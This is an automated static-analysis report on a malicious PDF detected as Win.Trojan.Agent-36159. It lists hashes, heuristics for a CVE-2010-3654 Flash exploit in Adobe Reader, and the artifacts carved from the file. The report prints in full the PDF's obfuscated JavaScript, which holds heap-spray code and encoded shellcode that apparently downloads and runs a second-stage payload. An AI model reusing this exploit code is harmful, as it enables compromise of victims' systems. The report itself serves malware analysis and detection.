Win.Trojan.Agent-36159 — PDF malware analysis

Static analysis result for SHA-256 cb33fa5931867290…

MALICIOUS

PDF

111.9 KB Created: 2010-11-12 16:05:24 +08:00 Authoring application: pdfFactory Pro www.fineprint.cn (via pdfFactory Pro 2.53 (Windows XP Professional Chinese)) First seen: 2013-08-26
MD5: 569cb0a9f22e21a03946246206094bc3 SHA-1: eb3802511d3dc9c41455526835ca5fe43d2f47e9 SHA-256: cb33fa5931867290dd59c9b986ecc05ec013939f43f806b81a62f4db00112549
342 Risk Score

Malware Insights

Win.Trojan.Agent-36159 · confidence 95%

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains an embedded Flash RichMedia object that exploits CVE-2010-3654 in Adobe Reader. This exploit likely leads to the execution of JavaScript code found within the sample, which is heavily obfuscated but appears to be designed to download and execute a second-stage payload. ClamAV detection as 'Win.Trojan.Agent-36159' further supports the malicious nature of the file.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9976

Heuristics 11

  • Adobe Reader authplay SWF exploit in PDF — CVE-2010-3654 critical CVE likely CVE_2010_3654_FLASH_RICHMEDIA
    PDF combines RichMedia Flash activation, an ActionScript 3 SWF containing DoABC/SymbolClass code with URLRequest or StagePlayer/ByteArray/loadBytes markers, and PDF-side shellcode heap-spray staging. This is the static delivery shape associated with CVE-2010-3654 Adobe Reader/Acrobat authplay Flash handling.
  • ClamAV: Win.Trojan.Agent-36159 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Agent-36159
  • Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGE
    A valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
  • RichMedia (Flash) high PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector (matched inside decoded stream)
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload (matched inside decoded stream)
  • External URI info PDF_URI
    PDF contains an external URL action
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.fineprint.cn PDF link annotation
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj-001_000.js pdf-javascript-stream PDF /JS object -1 at offset 0x397 2609 bytes
SHA-256: ec1395e214f5aaa1d87c6a445007e25401e4731f97fdcc390d74fe672f7ce854
Detection
ClamAV: Win.Trojan.Agent-36159
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var ss;//ahlfah

for(i=0;i<18000;i++)

ss = ss+0x70;

function rep(str)
{
	var sc='';
	for(var i=2;i<str["\x6c\x65\x6e\x67\x74\x68"];i+=6) 
	sc+="\x25\x75"+str["\x73\x75\x62\x73\x74\x72"](i,4);
	return sc;
}

var une = unescape;

var sc = "48c8d94874d948f42448eeba48e0ec4829de485fc9483ab148573148831448100148260248560748dee04855ee48dee448ecee48edbf48882e48eb6b48ecde48dee0489a654855ec48f09848b06b4867e648feb648da65489cd84899f6488f134899654855dc48c29a48dd9848ba1b48a86b48efce48ed1548a5274873a14829ed4805d34852e148e6f048981c481fe848e1254804e34807ae48e5114899f148800748b26548ddc4488a3348d26b4867a548c2be4831ed48da6b48ef65487525480eb748ed5c486f3548da2348ec844821b34810b948d9db481f9b488169487512488cb2489b114821e448109948891f487516489e8a48ec8648def04813ee48d6974813bc482ab748ab6748b4184861ee482aa74813be48d697489b1148211848109948891f48671e48d2af48ab65481e18483ce648ee6048ac2448290248bb114836184813af48211f4889f848ce1a4826ba484f4f48e44248a83a48774348019d48535f48dee148d1db48dee148866148dee048eff248dee0";
sc = une(rep(sc));

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";
var s3 = "\x73\x75\x62\x73\x74\x72";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}
function s()
{
c=p(a("58585858"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c[s2](0,(0x5858-0x24)/2);
b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb070058585858154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700"));
b += sc;
b += c;
d = b[s2](0,0x10000/2);
e = c[s2](0,0x8000-(0x1020-0x08)/2);
while(d[len] < 0x80000) d+=d;
_3 = d[s2](0,0x80000-(0x1020-0x08)/2);
_4= new Array();
_5 =    new Array();
for(i=0;i<0x300;i=i+1)
for(j=0;j<16;j++)
 _5[i*16+j]=e+"y";

for(i=0;i<0x300;i=i+1)
for(j=0;j<15;j++)
 _5[i*16+j]=null;


for(i=0;i<0x1E0;i=i+1)	_4[i]				=_3		+ "s";
}
s();
stream_012_off00019c5f.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x19C5F 419 bytes
SHA-256: 50a053206d85c622062389d3a0c86603ef19af8c58b2cd6a12c9a805c70d26bf
objstm_0027_00.bin pdf-objstm-decoded PDF /ObjStm 27 0 obj (inflated) 1170 bytes
SHA-256: 667b2c75ccf7ac530ab7ab1335ed88701c878c9bd33ce7626a853b18be32e7d1
font_00_sfnt_off00019dd5.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x19DD5 3200 bytes
SHA-256: da221eaf9c0703b15f52b4a6970fa71a439df3d18f75c8d84d8a42bde6044dfb
polyglot_child_pdf_off00018c61.pdf polyglot-child-pdf Secondary PDF body inside pdf container at offset 0x18C61 13136 bytes
SHA-256: c47c4c4cd061f300426db998205066483446e6d505344abd55292cb50df88291
polyglot_child_pdf_off0001a7c4.pdf polyglot-child-pdf Secondary PDF body inside pdf container at offset 0x1A7C4 6125 bytes
SHA-256: 0b1c923c8a0028794f3a3244dc498786746334f394e41678cc58ffbeb707d0a8